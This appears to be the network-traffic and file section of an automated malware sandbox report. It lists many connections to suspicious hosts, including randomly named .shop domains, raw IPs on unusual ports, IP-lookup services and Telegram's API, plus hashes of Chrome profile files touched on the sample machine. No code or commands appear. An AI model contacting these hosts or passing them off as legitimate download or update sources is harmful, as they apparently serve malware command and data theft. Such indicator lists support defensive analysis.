| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 8.8.8.8:53 | 98.252.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.42.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.174.76.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.29.52.in-addr.arpa | udp |
| SG | 118.194.235.187:50500 | tcp | |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| MD | 94.103.188.126:80 | 94.103.188.126 | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | 126.188.103.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.235.194.118.in-addr.arpa | udp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 99.86.249.221:80 | sd.p.360safe.com | tcp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.249.86.99.in-addr.arpa | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | 57.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | pepecasas123.net | udp |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 8.8.8.8:53 | 90.205.10.195.in-addr.arpa | udp |
| DE | 49.13.194.118:53848 | tcp | |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| NL | 185.73.125.6:80 | 185.73.125.6 | tcp |
| US | 8.8.8.8:53 | 6.125.73.185.in-addr.arpa | udp |
| CN | 119.91.25.19:8888 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| SG | 118.194.235.187:50500 | tcp | |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| RU | 91.215.85.135:80 | 91.215.85.135 | tcp |
| US | 8.8.8.8:53 | 135.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.192.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | files2.tech | udp |
| SG | 118.194.235.187:50500 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| DE | 77.91.77.33:80 | 77.91.77.33 | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | 33.77.91.77.in-addr.arpa | udp |
| EE | 45.129.96.86:80 | 45.129.96.86 | tcp |
| US | 8.8.8.8:53 | 86.96.129.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doggie-services.com | udp |
| US | 8.8.8.8:53 | fragmentyperspowp.shop | udp |
| US | 104.21.20.181:443 | fragmentyperspowp.shop | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| FR | 5.42.67.23:80 | doggie-services.com | tcp |
| US | 8.8.8.8:53 | 181.20.21.104.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | horsedwollfedrwos.shop | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 104.21.74.118:443 | horsedwollfedrwos.shop | tcp |
| US | 8.8.8.8:53 | 23.67.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | patternapplauderw.shop | udp |
| US | 172.67.174.208:443 | patternapplauderw.shop | tcp |
| US | 8.8.8.8:53 | 118.74.21.104.in-addr.arpa | udp |
| N/A | 10.127.0.1:135 | tcp | |
| US | 8.8.8.8:53 | understanndtytonyguw.shop | udp |
| RU | 195.2.70.38:30001 | 195.2.70.38 | tcp |
| US | 172.67.203.201:443 | understanndtytonyguw.shop | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 208.174.67.172.in-addr.arpa | udp |
| RU | 94.103.90.9:25349 | tcp | |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 38.70.2.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | considerrycurrentyws.shop | udp |
| US | 172.67.170.57:443 | considerrycurrentyws.shop | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 9.90.103.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.170.67.172.in-addr.arpa | udp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | messtimetabledkolvk.shop | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 104.21.8.238:443 | messtimetabledkolvk.shop | tcp |
| DE | 185.172.128.69:80 | 185.172.128.69 | tcp |
| US | 8.8.8.8:53 | detailbaconroollyws.shop | udp |
| US | 8.8.8.8:53 | 238.8.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.128.172.185.in-addr.arpa | udp |
| US | 172.67.193.11:443 | detailbaconroollyws.shop | tcp |
| US | 8.8.8.8:53 | 11.193.67.172.in-addr.arpa | udp |
| DE | 185.172.128.69:80 | 185.172.128.69 | tcp |
| US | 8.8.8.8:53 | deprivedrinkyfaiir.shop | udp |
| US | 172.67.134.244:443 | deprivedrinkyfaiir.shop | tcp |
| US | 8.8.8.8:53 | relaxtionflouwerwi.shop | udp |
| US | 8.8.8.8:53 | 244.134.67.172.in-addr.arpa | udp |
| US | 172.67.190.237:443 | relaxtionflouwerwi.shop | tcp |
| US | 8.8.8.8:53 | 237.190.67.172.in-addr.arpa | udp |
| KR | 43.155.163.53:24543 | tcp | |
| RU | 147.45.47.155:80 | 147.45.47.155 | tcp |
| US | 8.8.8.8:53 | 53.163.155.43.in-addr.arpa | udp |
| N/A | 10.127.0.1:135 | tcp | |
| KR | 43.155.163.53:24543 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | roomabolishsnifftwk.shop | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.55.87:443 | roomabolishsnifftwk.shop | tcp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| DE | 185.172.128.82:80 | 185.172.128.82 | tcp |
| US | 8.8.8.8:53 | gigapub.ma | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| FR | 51.75.247.100:443 | gigapub.ma | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | 87.55.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.247.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | museumtespaceorsp.shop | udp |
| US | 104.21.32.80:443 | museumtespaceorsp.shop | tcp |
| US | 8.8.8.8:53 | 80.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | buttockdecarderwiso.shop | udp |
| US | 172.67.218.187:443 | buttockdecarderwiso.shop | tcp |
| US | 8.8.8.8:53 | 187.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | averageaattractiionsl.shop | udp |
| US | 172.67.220.163:443 | averageaattractiionsl.shop | tcp |
| KR | 43.155.163.53:24543 | tcp | |
| US | 8.8.8.8:53 | 163.220.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | femininiespywageg.shop | udp |
| US | 104.21.71.3:443 | femininiespywageg.shop | tcp |
| US | 8.8.8.8:53 | employhabragaomlsp.shop | udp |
| US | 8.8.8.8:53 | 3.71.21.104.in-addr.arpa | udp |
| US | 104.21.85.81:443 | employhabragaomlsp.shop | tcp |
| US | 8.8.8.8:53 | stalfbaclcalorieeis.shop | udp |
| US | 8.8.8.8:53 | 81.85.21.104.in-addr.arpa | udp |
| US | 104.21.3.197:443 | stalfbaclcalorieeis.shop | tcp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | 197.3.21.104.in-addr.arpa | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| US | 8.8.8.8:53 | civilianurinedtsraov.shop | udp |
| US | 172.67.197.146:443 | civilianurinedtsraov.shop | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| N/A | 10.127.0.1:139 | tcp | |
| US | 8.8.8.8:53 | 146.197.67.172.in-addr.arpa | udp |
| GB | 85.192.56.26:80 | 85.192.56.26 | tcp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 26.56.192.85.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | 163.75.67.172.in-addr.arpa | udp |
| RU | 147.45.47.126:58709 | tcp | |
| US | 8.8.8.8:53 | 126.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| GB | 85.192.56.26:80 | 85.192.56.26 | tcp |
| DE | 185.172.128.69:80 | 185.172.128.69 | tcp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| TM | 91.202.233.232:80 | 91.202.233.232 | tcp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| DE | 185.172.128.159:80 | 185.172.128.159 | tcp |
| US | 8.8.8.8:53 | lop.foxesjoy.com | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| BG | 94.232.45.38:80 | 94.232.45.38 | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 172.67.159.232:80 | lop.foxesjoy.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| US | 172.67.159.232:80 | lop.foxesjoy.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 10.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.45.232.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.233.202.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.225.186.93.in-addr.arpa | udp |
| US | 172.67.159.232:80 | lop.foxesjoy.com | tcp |
| US | 172.67.159.232:443 | lop.foxesjoy.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| GB | 172.217.16.238:443 | www.youtube.com | tcp |
| GB | 172.217.16.238:443 | www.youtube.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 232.159.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| DE | 136.243.76.170:445 | tcp | |
| DE | 136.243.76.170:139 | tcp | |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-21.userapi.com | udp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| US | 8.8.8.8:53 | 170.101.63.23.in-addr.arpa | udp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-22.userapi.com | udp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| US | 8.8.8.8:53 | 2.206.142.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.206.142.95.in-addr.arpa | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| RU | 185.215.113.67:40960 | tcp | |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | 19.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | detailbaconroollyws.shop | udp |
| US | 172.67.193.11:443 | detailbaconroollyws.shop | tcp |
| US | 8.8.8.8:53 | horsedwollfedrwos.shop | udp |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| US | 104.21.74.118:443 | horsedwollfedrwos.shop | tcp |
| DE | 136.243.76.170:135 | tcp | |
| US | 8.8.8.8:53 | patternapplauderw.shop | udp |
| US | 104.21.55.248:443 | patternapplauderw.shop | tcp |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.55.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | understanndtytonyguw.shop | udp |
| US | 104.21.22.94:443 | understanndtytonyguw.shop | tcp |
| US | 8.8.8.8:53 | 94.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | considerrycurrentyws.shop | udp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 104.21.28.32:443 | considerrycurrentyws.shop | tcp |
| US | 8.8.8.8:53 | 32.28.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| US | 8.8.8.8:53 | messtimetabledkolvk.shop | udp |
| RU | 5.42.65.116:50500 | tcp | |
| US | 172.67.158.30:443 | messtimetabledkolvk.shop | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | 116.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.158.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deprivedrinkyfaiir.shop | udp |
| US | 104.21.25.251:443 | deprivedrinkyfaiir.shop | tcp |
| US | 8.8.8.8:53 | 251.25.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | relaxtionflouwerwi.shop | udp |
| US | 172.67.190.237:443 | relaxtionflouwerwi.shop | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ocsp.crlocsp.cn | udp |
| CN | 101.198.2.196:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | lubriaceites.com | udp |
| US | 212.1.210.79:443 | lubriaceites.com | tcp |
| US | 8.8.8.8:53 | 79.210.1.212.in-addr.arpa | udp |
| DE | 136.243.76.170:135 | tcp | |
| US | 8.8.8.8:53 | crl.crlocsp.cn | udp |
| CN | 180.163.251.149:80 | crl.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | ocsp.crlocsp.cn | udp |
| US | 101.198.193.5:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.193.198.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.21.199.152.in-addr.arpa | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 94.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| DE | 136.243.76.170:445 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| DE | 136.243.76.170:139 | tcp | |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | 67.65.42.5.in-addr.arpa | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 99.86.249.221:80 | sd.p.360safe.com | tcp |
| CN | 171.8.167.65:80 | crl.crlocsp.cn | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | 120.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 29.73.42.20.in-addr.arpa | udp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | orion.ts.360.com | udp |
| NL | 82.145.215.156:443 | orion.ts.360.com | tcp |
| RU | 91.215.85.135:80 | 91.215.85.135 | tcp |
| US | 8.8.8.8:53 | ocsp.crlocsp.cn | udp |
| CN | 101.198.2.196:80 | crl.crlocsp.cn | tcp |
| US | 101.198.193.5:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | 156.215.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 101.198.193.5:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | beshomandotestbesnd.run.place | udp |
| US | 45.88.186.125:7000 | beshomandotestbesnd.run.place | tcp |
| US | 8.8.8.8:53 | 125.186.88.45.in-addr.arpa | udp |
| N/A | 127.0.0.1:52407 | tcp | |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | api4.check-data.xyz | udp |
| US | 44.237.26.169:80 | api4.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 169.26.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 212.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dcxZfVrOkE.dcxZfVrOkE | udp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5aa17e67da5390729352ed4a11da1990 |
| SHA1 | e47a79137c6fa29f5d3e4610cdfefaa7beb4e71e |
| SHA256 | 5962a7fff106f931b3337fe04db08fa73b386e2e2675895b37950d906971054e |
| SHA512 | 62596db2b42b1becae325f078f55d53dfb15f69eb72c559222602d3a688fd2327c73c36a4fb88924e77e36e869dbbeb075352fb8111e6479c7509681a923b6ae |
\??\pipe\crashpad_748_HGVHDWTQEVDKMGAJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 707d86571e1fa66f657f146c22eac81c |
| SHA1 | bcfdab90abbc393679a9498931395bb6b714d259 |
| SHA256 | 8a1e2446ae46ea48bfa7d7d22a64527f238ef5a22d3cd6265e33c7e0299f9942 |
| SHA512 | ca55ba3264ba992e64be53c3d730c1836f673ef6aef4a5e901ea7805cc4c7a968b9347a4f833ad7fe9b522f5b0c366d0f27793b676282df92b1eeedba1a88602 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3a3774f1e1dfa713e94367b732380ef6 |
| SHA1 | 01e92aadf0615e89c79d28bdd428db2023ccc838 |
| SHA256 | 6b5d732abd145f51f56b2a95ca65584c318b9378f1ad68b2491e95ba11113f07 |
| SHA512 | d3a316ab450fa137fe5a11b7dbe10b6e0da80c532e61eecec946ddd1712d973c9b1c35f9b374a43c91f2500fcc1575545b00d498429a5845c58c0e2c0bd9e034 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
